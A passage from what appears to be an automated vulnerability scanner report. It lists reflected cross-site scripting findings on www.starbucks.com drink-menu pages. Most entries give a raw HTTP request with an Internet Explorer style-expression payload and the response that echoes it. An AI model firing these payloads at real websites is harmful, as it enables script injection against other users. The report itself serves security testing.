This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/espresso-shot?c1525"style%3d"x%3aexpression(alert(1))"c72de6024ef=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:07 GMT
Connection: close
Content-Length: 42260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/espresso-shot?c1525"style="x:expression(alert(1))"c72de6024ef=1"/>
...[SNIP]...

1.728. http://www.starbucks.com/menu/drinks/espresso/flavored-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/flavored-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dceb"style%3d"x%3aexpression(alert(1))"01f34e806e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5dceb"style="x:expression(alert(1))"01f34e806e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/flavored-latte?5dceb"style%3d"x%3aexpression(alert(1))"01f34e806e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:40 GMT
Connection: close
Content-Length: 42615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/flavored-latte?5dceb"style="x:expression(alert(1))"01f34e806e=1"/>
...[SNIP]...

1.729. http://www.starbucks.com/menu/drinks/espresso/gingerbread-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/gingerbread-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb272"style%3d"x%3aexpression(alert(1))"511c9e6d392 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb272"style="x:expression(alert(1))"511c9e6d392 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/gingerbread-latte?fb272"style%3d"x%3aexpression(alert(1))"511c9e6d392=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:15 GMT
Connection: close
Content-Length: 43423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/gingerbread-latte?fb272"style="x:expression(alert(1))"511c9e6d392=1"/>
...[SNIP]...

1.730. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-americano [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caffe-americano

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26f3"style%3d"x%3aexpression(alert(1))"5d8d8ff815a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b26f3"style="x:expression(alert(1))"5d8d8ff815a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-caffe-americano?b26f3"style%3d"x%3aexpression(alert(1))"5d8d8ff815a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:51 GMT
Connection: close
Content-Length: 42566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-caffe-americano?b26f3"style="x:expression(alert(1))"5d8d8ff815a=1"/>
...[SNIP]...

1.731. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caffe-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a85b"style%3d"x%3aexpression(alert(1))"5c1bfe82ef3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a85b"style="x:expression(alert(1))"5c1bfe82ef3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-caffe-latte?2a85b"style%3d"x%3aexpression(alert(1))"5c1bfe82ef3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:24 GMT
Connection: close
Content-Length: 42746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-caffe-latte?2a85b"style="x:expression(alert(1))"5c1bfe82ef3=1"/>
...[SNIP]...

1.732. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caffe-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feb2c"style%3d"x%3aexpression(alert(1))"fb386894d81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as feb2c"style="x:expression(alert(1))"fb386894d81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-caffe-mocha?feb2c"style%3d"x%3aexpression(alert(1))"fb386894d81=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:08 GMT
Connection: close
Content-Length: 42988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-caffe-mocha?feb2c"style="x:expression(alert(1))"fb386894d81=1"/>
...[SNIP]...

1.733. http://www.starbucks.com/menu/drinks/espresso/iced-caramel-macchiato [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caramel-macchiato

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7963d"style%3d"x%3aexpression(alert(1))"1846f5f581e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7963d"style="x:expression(alert(1))"1846f5f581e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-caramel-macchiato?7963d"style%3d"x%3aexpression(alert(1))"1846f5f581e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:15 GMT
Connection: close
Content-Length: 42903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-caramel-macchiato?7963d"style="x:expression(alert(1))"1846f5f581e=1"/>
...[SNIP]...

1.734. http://www.starbucks.com/menu/drinks/espresso/iced-cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-cinnamon-dolce-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80403"style%3d"x%3aexpression(alert(1))"2617616deb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80403"style="x:expression(alert(1))"2617616deb8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-cinnamon-dolce-latte?80403"style%3d"x%3aexpression(alert(1))"2617616deb8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:50 GMT
Connection: close
Content-Length: 43040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-cinnamon-dolce-latte?80403"style="x:expression(alert(1))"2617616deb8=1"/>
...[SNIP]...

1.735. http://www.starbucks.com/menu/drinks/espresso/iced-flavored-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-flavored-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2e21"style%3d"x%3aexpression(alert(1))"78381d7a361 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a2e21"style="x:expression(alert(1))"78381d7a361 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-flavored-latte?a2e21"style%3d"x%3aexpression(alert(1))"78381d7a361=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:51 GMT
Connection: close
Content-Length: 42981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-flavored-latte?a2e21"style="x:expression(alert(1))"78381d7a361=1"/>
...[SNIP]...

1.736. http://www.starbucks.com/menu/drinks/espresso/iced-gingerbread-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-gingerbread-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15bbb"style%3d"x%3aexpression(alert(1))"b07d6033aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15bbb"style="x:expression(alert(1))"b07d6033aae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-gingerbread-latte?15bbb"style%3d"x%3aexpression(alert(1))"b07d6033aae=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:50 GMT
Connection: close
Content-Length: 43417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-gingerbread-latte?15bbb"style="x:expression(alert(1))"b07d6033aae=1"/>
...[SNIP]...

1.737. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-peppermint-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cd5e"style%3d"x%3aexpression(alert(1))"741f7a7ef73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3cd5e"style="x:expression(alert(1))"741f7a7ef73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-peppermint-mocha?3cd5e"style%3d"x%3aexpression(alert(1))"741f7a7ef73=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:00 GMT
Connection: close
Content-Length: 43056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-mocha?3cd5e"style="x:expression(alert(1))"741f7a7ef73=1"/>
...[SNIP]...

1.738. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-peppermint-white-chocolate-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e18af"style%3d"x%3aexpression(alert(1))"fb96fc1e474 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e18af"style="x:expression(alert(1))"fb96fc1e474 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-peppermint-white-chocolate-mocha?e18af"style%3d"x%3aexpression(alert(1))"fb96fc1e474=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:04 GMT
Connection: close
Content-Length: 43381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha?e18af"style="x:expression(alert(1))"fb96fc1e474=1"/>
...[SNIP]...

1.739. http://www.starbucks.com/menu/drinks/espresso/iced-pumpkin-spice-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-pumpkin-spice-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebcde"style%3d"x%3aexpression(alert(1))"7566495fc72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ebcde"style="x:expression(alert(1))"7566495fc72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-pumpkin-spice-latte?ebcde"style%3d"x%3aexpression(alert(1))"7566495fc72=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:25 GMT
Connection: close
Content-Length: 43588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-pumpkin-spice-latte?ebcde"style="x:expression(alert(1))"7566495fc72=1"/>
...[SNIP]...

1.740. http://www.starbucks.com/menu/drinks/espresso/iced-skinny-flavored-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-skinny-flavored-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63d99"style%3d"x%3aexpression(alert(1))"d163db6da2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 63d99"style="x:expression(alert(1))"d163db6da2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-skinny-flavored-latte?63d99"style%3d"x%3aexpression(alert(1))"d163db6da2d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:55 GMT
Connection: close
Content-Length: 43267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-skinny-flavored-latte?63d99"style="x:expression(alert(1))"d163db6da2d=1"/>
...[SNIP]...

1.741. http://www.starbucks.com/menu/drinks/espresso/iced-toffee-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-toffee-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29fbd"style%3d"x%3aexpression(alert(1))"1ea5a8b090d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29fbd"style="x:expression(alert(1))"1ea5a8b090d in the application's response.

